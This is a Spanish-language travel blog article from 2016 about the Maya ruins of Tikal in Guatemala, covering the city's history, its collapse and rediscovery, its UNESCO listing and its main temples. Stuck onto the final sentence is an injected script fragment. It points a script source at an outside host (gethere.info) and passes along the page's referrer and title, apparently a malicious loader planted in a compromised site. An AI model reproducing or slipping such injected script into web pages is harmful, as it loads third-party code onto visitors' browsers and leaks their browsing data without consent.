Jugando a Indiana Jones en Tikal

08/03/2016

Visitar_TikalDe Guatemala gusta todo. No obstante, es uno de los destinos favoritos de Centroamérica. A Guatemala llegan los viajeros en busca de bellas ciudades coloniales, naturaleza exuberante, mercados asombrosos y yacimientos arqueológicos como para sentirse un auténtico Indiana Jones.

Guatemala está situado en lo que una vez fue Mesoamérica, el área geográfica que comprende, además de Guatemala, la mitad meridional de México, El Salvador, Belice, junto al occidente de Honduras, Nicaragua y Costa Rica. En tal extensión geográfica se desarrollaron diferentes culturas indígenas en un mosaico de diversidad lingüística y étnica como la gran Cultura Maya. Así, Centroamérica es como es, y provoca que al viajero, cuando llega a la región, se le despierta la pasión del aventurero arqueólogo en busca del misterio de antiguas y misteriosas civilizaciones en medio de la selva.

Una ciudad misteriosa en la selva

Tikal, es uno de los grandes entre los yacimientos arqueológicos de la civilización Maya precolombina y uno de los lugares que más pasiones despierta entre los aficionados a la arqueología. En Guatemala, es uno de los imprescindibles, y es que a todos nos gusta acercarnos a la que fue una de las civilizaciones precolombinas más fascinantes.

Tikal, fue la capital de uno de los reinos más poderosos de los antiguos mayas. La historia de la ciudad se remonta desde el siglo IV a.c  hasta poco después del año 951, en que queda abandonada ¿Qué ocurrió en tan poderoso lugar? La crisis del colapso maya clásico se extendía por toda la región, guerra endémica, deforestación, hambrunas, contribuyeron al fin del lugar, que pasó a ser parte de la selva por los siguientes mil años, hasta que una expedición comandada por el entonces gobernador de Petén, Modesto Méndez, la volvió a descubrir para todos.

Descripción de la ciudad de Tikal

El yacimiento arqueológico de Tikal se encuentra dentro del Parque Nacional Tikal, en el departamento de Petén. El parque fue declarado Patrimonio de la Humanidad por parte de la Unesco en 1979.

Sólo cuando ves el amanecer de la selva, con los Templos I, II, III y V sobresalir de la vegetación, desde la parte superior de las escalinatas del Templo IV, comienzas a comprender la grandiosidad de una ciudad construida en piedra caliza en el corazón verde de la selva guatemalteca. Pero para acabar de comprender el lugar y poder apreciar los templos que se elevan a más de 70 metros de altura, las ruinas de palacios y hasta siete lugares de juegos pelota, lo mejor es que tu visita, sea acompañado por un guía local.

A pesar de los muchos tesoros que encontramos allí, los  principales protagonistas de las fotos de los visitantes son el Templo I o Templo del Gran Jaguar, una pirámide funeraria dedicada a Jasaw Chan K’awil y el Templo II o Templo de las Máscaras dedicado a la esposa de Jasaw Chan K’awil y ubicado en la Gran Plaza. Ambos, deslumbran por su espectacular arquitectura Maya. El resto de la ciudad, con sus calzadas, acrópolis y diferentes conjuntos, hará que te sientas como Indiana Jones en el templo perdido. ¡Guatemala te espera!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO